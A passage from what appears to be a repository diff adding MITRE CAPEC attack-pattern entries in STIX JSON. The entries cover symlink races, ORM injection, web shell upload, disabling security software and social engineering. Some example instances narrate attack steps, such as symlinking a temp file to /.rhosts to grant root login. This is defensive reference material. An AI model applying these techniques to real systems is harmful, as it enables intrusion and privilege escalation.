"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/367.html",
"external_id": "CWE-367"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/61.html",
"external_id": "CWE-61"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/662.html",
"external_id": "CWE-662"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/689.html",
"external_id": "CWE-689"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/667.html",
"external_id": "CWE-667"
},
{
"source_name": "reference_from_CAPEC",
"description": "Wikipedia, The Wikimedia Foundation, Inc",
"url": "http://en.wikipedia.org/wiki/Symlink_race",
"external_id": "REF-115"
},
{
"source_name": "reference_from_CAPEC",
"description": "mkstemp (IEEE Std 1003.1, 2004 Edition), The Open Group Base Specifications Issue 6",
"url": "http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html",
"external_id": "REF-116"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Resource Consumption (Denial of Service)"
],
"Confidentiality": [
"Gain Privileges"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \"efficiency,\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.</xhtml:p>\n <xhtml:p>The directory /tmp is world-writable. Malicious user Mallory creates a symbolic link to the file /.rhosts named /tmp/foo. Then, she invokes foo with \"user\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \"user password\")) in it. It removes the temporary file (merely removing the symbolic link).</xhtml:p>\n <xhtml:p>Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.</xhtml:p>\n <xhtml:p>[R.27.1]</xhtml:p>\n ",
"GNU \"ed\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939",
"OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894",
"Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972"
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The attacker is able to create Symlink links on the target host.",
"Tainted data from the attacker is used and copied to temporary files.",
"The target host does insecure temporary file creation."
],
"x_capec_skills_required": {
"Medium": "This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them)."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1c638c80-8f7d-439c-9746-6c8c902afeba.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--9a5ceeec-abe0-4844-9ba1-05990a4fed58",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1c638c80-8f7d-439c-9746-6c8c902afeba",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "DEPRECATED: Information Gathering from Non-Traditional Sources",
"description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/409.html",
"external_id": "CAPEC-409"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1c8cd7af-cc50-486e-a444-99781d82c018.json
+36
View File
@@ -0,0 +1,36 @@
{
"type": "bundle",
"id": "bundle--be21224c-246d-42ca-9b93-202c12e92c37",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1c8cd7af-cc50-486e-a444-99781d82c018",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2014-06-23T00:00:00.000Z",
"name": "Target Influence via The Human Buffer Overflow",
"description": "An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message. The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human \"buffer overflow\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/433.html",
"external_id": "CAPEC-433"
},
{
"source_name": "reference_from_CAPEC",
"description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
"url": "http://www.social-engineer.org",
"external_id": "REF-348"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1cfd2b18-1f29-43cc-b800-4a52fa63f388.json
+36
View File
@@ -0,0 +1,36 @@
{
"type": "bundle",
"id": "bundle--5689a0d0-8858-4989-bc83-3d8b8382e47a",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1cfd2b18-1f29-43cc-b800-4a52fa63f388",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Principal Spoof",
"description": "A Principal Spoof is a form of Identity Spoofing where an adversary pretends to be some other person in an interaction. This is often accomplished by crafting a message (either written, verbal, or visual) that appears to come from a person other than the adversary. Phishing and Pharming attacks often attempt to do this so that their attempts to gather sensitive information appear to come from a legitimate source. A Principal Spoof does not use stolen or spoofed authentication credentials, instead relying on the appearance and content of the message to reflect identity. The possible outcomes of a Principal Spoof mirror those of Identity Spoofing. (e.g., escalation of privilege and false attribution of data or activities) Likewise, most techniques for Identity Spoofing (crafting messages or intercepting and replaying or modifying messages) can be used for a Principal Spoof attack. However, because a Principal Spoof is used to impersonate a person, social engineering can be both an attack technique (using social techniques to generate evidence in support of a false identity) as well as a possible outcome (manipulating people's perceptions by making statements or performing actions under a target's name).",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/195.html",
"external_id": "CAPEC-195"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_prerequisites": [
"The target must associate data or activities with a person's identity and the adversary must be able to modify this identity without detection."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4.json
+37
View File
@@ -0,0 +1,37 @@
{
"type": "bundle",
"id": "bundle--1cb061df-2b6f-4d92-8d59-9db4bfcc2132",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Remote Code Inclusion",
"description": "The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/253.html",
"external_id": "CAPEC-253"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/829.html",
"external_id": "CWE-829"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_prerequisites": [
"Target application server must allow remote files to be included.The malicious file must be placed on the remote machine previously."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac.json
+92
View File
@@ -0,0 +1,92 @@
{
"type": "bundle",
"id": "bundle--d51e61ad-6c29-4813-808b-d73bca7c4ea4",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Object Relational Mapping Injection",
"description": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/109.html",
"external_id": "CAPEC-109"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/20.html",
"external_id": "CWE-20"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/100.html",
"external_id": "CWE-100"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/89.html",
"external_id": "CWE-89"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/564.html",
"external_id": "CWE-564"
},
{
"source_name": "reference_from_CAPEC",
"description": "OWASP Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)",
"url": "http://www.owasp.org/index.php/Testing_for_ORM_Injection",
"external_id": "REF-4"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Unreliable Execution",
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Read Data",
"Gain Privileges",
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Integrity": [
"Modify Data",
"Execute Unauthorized Commands (Run Arbitrary Code)"
]
},
"x_capec_example_instances": [
"When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"An application uses data access layer generated by an ORM tool or framework",
"An application uses user supplied data in queries executed against the database",
"The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework"
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"Medium": "Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db.json
+54
View File
@@ -0,0 +1,54 @@
{
"type": "bundle",
"id": "bundle--e3cee08c-49dd-4a2f-aaa8-aac7f85c1b0f",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Fault Injection",
"description": "The adversary uses disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior in electronic devices. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/624.html",
"external_id": "CAPEC-624"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_alternate_terms": [
"Side-Channel Attack"
],
"x_capec_consequences": {
"Confidentiality": [
"Read Data (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, he or she has compromised the confidentiality of that application or information system data.)",
"Bypass Protection Mechanism (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, he or she has compromised the confidentiality of that application or information system data.)",
"Hide Activities (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, he or she has compromised the confidentiality of that application or information system data.)"
],
"Integrity": [
"Execute Unauthorized Commands (If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised.)"
]
},
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"Physical access to the system",
"The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation."
],
"x_capec_resources_required": [
"\n <xhtml:p>The relevant sensors and tools to detect and analyze fault/side-channel data from a system.</xhtml:p>\n <xhtml:p>A tool capable of injecting fault/side-channel data into a system or application.</xhtml:p>\n "
],
"x_capec_skills_required": {
"High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80.json
+36
View File
@@ -0,0 +1,36 @@
{
"type": "bundle",
"id": "bundle--cb47fd86-3b75-4f38-bc30-56d897e93955",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Jamming",
"description": "An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/601.html",
"external_id": "CAPEC-601"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Availability": [
"Other (The jamming of equipment denies the availability of functioning communications services.)"
]
},
"x_capec_likelihood_of_attack": "Medium",
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f.json
+47
View File
@@ -0,0 +1,47 @@
{
"type": "bundle",
"id": "bundle--2913b8cd-d46f-4c24-8509-f0176fb853b4",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2018-05-04T00:00:00.000Z",
"modified": "2018-05-04T00:00:00.000Z",
"name": "Probe System Files",
"description": "An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/639.html",
"external_id": "CAPEC-639"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/552.html",
"external_id": "CWE-552"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Confidentiality": [
"Read Data"
]
},
"x_capec_example_instances": [
"Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.",
"Adversaries may search network shares on computers they have compromised to find files of interest."
],
"x_capec_prerequisites": [
"An adversary has access to the file system of a system."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242.json
+62
View File
@@ -0,0 +1,62 @@
{
"type": "bundle",
"id": "bundle--fa84b47f-6d5f-4634-8d11-94d5b5f78499",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2018-05-31T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Upload a Web Shell to a Web Server",
"description": "By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \"gateway\" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/650.html",
"external_id": "CAPEC-650"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/287.html",
"external_id": "CWE-287"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/553.html",
"external_id": "CWE-553"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Execute Unauthorized Commands"
],
"Confidentiality": [
"Read Data",
"Gain Privileges",
"Execute Unauthorized Commands"
],
"Integrity": [
"Execute Unauthorized Commands"
]
},
"x_capec_prerequisites": [
"The web server is susceptible to one of the various web application exploits that allows for uploading a shell file."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04.json
+34
View File
@@ -0,0 +1,34 @@
{
"type": "bundle",
"id": "bundle--476a0950-a572-488c-959a-c35e17b90206",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Run Software at Logon",
"description": "Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/564.html",
"external_id": "CAPEC-564"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/284.html",
"external_id": "CWE-284"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb.json
+47
View File
@@ -0,0 +1,47 @@
{
"type": "bundle",
"id": "bundle--2d5fac68-3486-46e2-9754-25ed5e8c8edb",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Disable Security Software",
"description": "An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/578.html",
"external_id": "CAPEC-578"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/284.html",
"external_id": "CWE-284"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Availability": [
"Hide Activities (By disabling certain security tools, the adversary can hide malicious activity and avoid detection.)"
]
},
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The adversary must have the capability to interact with the configuration of the targeted system."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_status": "Usable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f.json
+69
View File
@@ -0,0 +1,69 @@
{
"type": "bundle",
"id": "bundle--5a513095-7510-4733-8f90-ac6f7414457e",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Passing Local Filenames to Functions That Expect a URL",
"description": "This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/48.html",
"external_id": "CAPEC-48"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/241.html",
"external_id": "CWE-241"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/706.html",
"external_id": "CWE-706"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
},
{
"source_name": "reference_from_CAPEC",
"description": "Core Concepts: Attack Patterns",
"url": "https://websec.io/2012/11/26/Core-Concepts-Attack-Patterns.html",
"external_id": "REF-416"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Confidentiality": [
"Read Data"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">hibernate.connection.driver_class = org.postgresql.Driverhibernate.connection.url = jdbc:postgresql://localhost/mydatabasehibernate.connection.username = usernamehibernate.connection.password = passwordhibernate.c3p0.min_size=5hibernate.c3p0.max_size=20</xhtml:div>\n <xhtml:p>Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser"
],
"x_capec_skills_required": {
"Medium": "Attacker identifies known local files to exploit"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--21c7f7fe-73bf-40a8-8d85-c38596237db2.json
+35
View File
@@ -0,0 +1,35 @@
{
"type": "bundle",
"id": "bundle--2ef7078a-7654-4326-b0bf-0269377aa0ee",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--21c7f7fe-73bf-40a8-8d85-c38596237db2",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2014-06-23T00:00:00.000Z",
"name": "Target Influence via Interview and Interrogation",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/434.html",
"external_id": "CAPEC-434"
},
{
"source_name": "reference_from_CAPEC",
"description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
"url": "http://www.social-engineer.org",
"external_id": "REF-348"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--21ff93ae-e3a3-43ff-8cc4-44614e2604e4.json
+47
View File
@@ -0,0 +1,47 @@
{
"type": "bundle",
"id": "bundle--c4e97bad-09e6-42cf-8a89-0b56cc12b6a9",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--21ff93ae-e3a3-43ff-8cc4-44614e2604e4",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Documentation Alteration to Cause Errors in System Design",
"description": "An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/519.html",
"external_id": "CAPEC-519"
},
{
"source_name": "reference_from_CAPEC",
"description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation",
"url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf",
"external_id": "REF-439"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_example_instances": [
"During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \"fail open\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"Advanced knowledge of software capabilities of a manufacturer's product.",
"Access to the manufacturer's documentation."
],
"x_capec_skills_required": {
"High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--221c647a-ae2b-4c2b-b762-17727f367bbe.json
+66
View File
@@ -0,0 +1,66 @@
{
"type": "bundle",
"id": "bundle--8aef00eb-8033-4bb3-9007-189cd6232658",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--221c647a-ae2b-4c2b-b762-17727f367bbe",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Transaction or Event Tampering via Application API Manipulation",
"description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/385.html",
"external_id": "CAPEC-385"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/471.html",
"external_id": "CWE-471"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/345.html",
"external_id": "CWE-345"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/346.html",
"external_id": "CWE-346"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/602.html",
"external_id": "CWE-602"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/311.html",
"external_id": "CWE-311"
},
